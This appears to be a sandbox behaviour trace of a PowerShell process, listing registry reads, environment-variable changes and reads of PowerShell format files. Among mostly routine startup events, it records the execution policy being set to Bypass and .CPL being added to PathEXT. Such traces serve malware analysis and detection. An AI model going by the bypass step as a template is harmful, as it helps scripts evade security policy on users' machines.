1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| File | Get Info | filename = C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| Environment | Get Environment String | name = PSModulePath, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| Environment | Set Environment String | name = PSExecutionPolicyPreference, value = Bypass |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Environment | Get Environment String | name = PathEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
1 | |
| Environment | Set Environment String | name = PathEXT, value = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL |
|
1 | |
| Environment | Get Environment String | name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Environment, value_name = PSMODULEPATH, type = REG_NONE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Environment | Set Environment String | name = PSMODULEPATH, value = C:\Users\5JgHKoaOfdp\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
3 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell |
|
1 | |
| Environment | Get Environment String | name = HOMEDRIVE, result_out = C: |
|
1 | |
| Environment | Get Environment String | name = HOMEPATH, result_out = \Users\5JgHKoaOfdp |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| File | Get Info | filename = C:\Users\5JgHKoaOfdp, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| File | Get Info | filename = C:\, type = file_attributes |
|
2 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, size = 4096, size_out = 4096 |
|
62 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, size = 4096, size_out = 3368 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, size = 728, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\typesv3.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\typesv3.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\typesv3.ps1xml, size = 4096, size_out = 4096 |
|
4 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\typesv3.ps1xml, size = 4096, size_out = 1839 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\typesv3.ps1xml, size = 209, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\typesv3.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\typesv3.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 4096 |
|
6 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 2762 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 310, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, size = 4096, size_out = 4096 |
|
36 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, size = 4096, size_out = 246 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, size = 4096, size_out = 4096 |
|
5 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, size = 4096, size_out = 813 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, size = 4096, size_out = 4096 |
|
70 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, size = 4096, size_out = 1218 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, size = 830, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\HelpV3.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\HelpV3.format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\HelpV3.format.ps1xml, size = 4096, size_out = 4096 |
|
23 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\HelpV3.format.ps1xml, size = 4096, size_out = 3672 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\HelpV3.format.ps1xml, size = 424, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\HelpV3.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\HelpV3.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
